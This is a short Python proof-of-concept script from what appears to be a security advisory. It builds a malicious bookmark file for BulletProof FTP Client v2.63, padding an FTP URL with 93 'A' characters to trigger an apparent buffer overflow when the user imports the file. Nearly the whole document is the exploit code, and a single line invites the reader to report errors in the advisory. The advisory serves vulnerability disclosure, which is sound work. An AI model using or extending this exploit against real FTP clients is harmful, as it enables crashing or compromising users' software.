header1 = "; This file was exported from BulletProof FTP Client
vBulletProof FTP Client v2.63 (Build 56)\n"
header2 = "; Sitename=test site\n"
buff = "FTP://user:pass@" + "\x41" * 93
vuln = header1 + header2 + buff
try:
out_file = open("sites.txt",'w')
out_file.write(vuln)
out_file.close()
raw_input("\nBookmark file created!\n\nNow import the file and run
it\n\nPress to exit...")
except:
print "Error!"
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.